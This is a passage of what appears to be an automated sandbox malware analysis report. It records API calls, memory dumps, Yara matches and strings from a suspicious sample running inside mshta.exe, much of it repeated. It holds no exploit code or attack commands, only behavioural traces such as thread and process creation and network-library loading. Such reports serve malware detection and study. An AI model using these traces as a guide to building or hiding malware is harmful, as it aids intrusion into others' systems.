                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7E900225221405061545F5980A0450B048597D73513A9C056F241E590CC72189695326
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
• Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
• Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
• Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
• Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
• Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
• Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
• Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0

Control-flow Graph
                                                                                                                                                                                                                                                control_flow_graph 495 2f30b3b-2f30b43 496 2f30bc2 495->496 497 2f30b45-2f30b5a 495->497 498 2f30bc4-2f30bc7 496->498 497->498 499 2f30b5c-2f30b61 497->499 500 2f30b63-2f30b68 499->500 501 2f30bcd-2f30bfc call 2f4b270 call 2f4bc80 499->501 503 2f30b13-2f30b19 500->503 504 2f30b69-2f30b70 500->504 518 2f30bff-2f30c37 call 2f34310 call 2f21410 call 2f419d0 501->518 506 2f30b1b-2f30b35 503->506 507 2f30aad-2f30ac4 503->507 504->504 508 2f30b72-2f30b75 504->508 512 2f30b11 506->512 513 2f30b37-2f30b39 506->513 510 2f30b12-2f30b14 507->510 511 2f30ac6-2f30b07 507->511 523 2f30b16-2f30b19 510->523 524 2f30a9a-2f30aa4 510->524 514 2f30b7a-2f30b81 511->514 520 2f30b09-2f30b0e 511->520 512->510 513->514 517 2f30b83-2f30b8a 514->517 514->518 517->518 530 2f30c57-2f30c5d 518->530 531 2f30c39-2f30c48 PostThreadMessageW 518->531 520->512 523->506 523->507 531->530 532 2f30c4a-2f30c54 531->532 532->530
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(4-4-J4,00000111,00000000,00000000), ref: 02F30C44
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 1836367815-3753321779

                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 0-3753321779

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(4-4-J4,00000111,00000000,00000000), ref: 02F30C44
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 1836367815-3753321779

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(4-4-J4,00000111,00000000,00000000), ref: 02F30C44
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 1836367815-3753321779

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostThreadMessageW.USER32(4-4-J4,00000111,00000000,00000000), ref: 02F30C44
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePostThread
                                                                                                                                                                                                                                                • String ID: 4-4-J4$4-4-J4
                                                                                                                                                                                                                                                • API String ID: 1836367815-3753321779
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 02F438FB
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeUninitialize
                                                                                                                                                                                                                                                • String ID: @J7<
                                                                                                                                                                                                                                                • API String ID: 3442037557-2016760708
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F34382
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateProcessInternalW.KERNELBASE(?,?,1C8A0D8E,?,02F380E4,00000010,?,?,?,00000044,?,00000010,02F380E4,?,1C8A0D8E,?), ref: 02F49580
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateInternalProcess
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2186235152-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F29AF2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F29AF2
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,184EB60F,00000007,00000000,00000004,00000000,02F33B8D,000000F4), ref: 02F494CC
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(02F31859,?,02F454DF,02F31859,02F453FF,02F454DF,?,02F31859,02F453FF,00001000,?,?,00000000), ref: 02F4947F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02F3814A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00000002,000016A8,?,000004D8,00000000), ref: 02F3814A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02F31B40,02F47D3E,02F453FF,02F31B0D), ref: 02F37F51
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,02F31B40,02F47D3E,02F453FF,02F31B0D), ref: 02F37F51
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4595111777.0000000003B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B60000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3b60000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4592913893.0000000002F20000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F20000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_2f20000_mshta.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4595111777.0000000003B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B60000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3b60000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                                                                                                • API String ID: 0-3754132690
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4595111777.0000000003B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 03B60000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3b60000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                                                                                                                                                                                                • API String ID: 0-3754132690
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.4594573230.0000000003810000.00000040.00001000.00020000.00000000.sdmp, Offset: 03810000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.0000000003939000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.000000000393D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                • Associated: 00000008.00000002.4594573230.00000000039AE000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_3810000_mshta.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ___swprintf_l
                                                                                                                                                                                                                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                                                                                                                • API String ID: 48624451-2108815105
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • Execute=1, xrefs: 038B4713
                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 038B4742
                                                                                                                                                                                                                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 038B4787
                                                                                                                                                                                                                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 038B4655
                                                                                                                                                                                                                                                • ExecuteOptions, xrefs: 038B46A0
                                                                                                                                                                                                                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 038B4725
                                                                                                                                                                                                                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 038B46FC
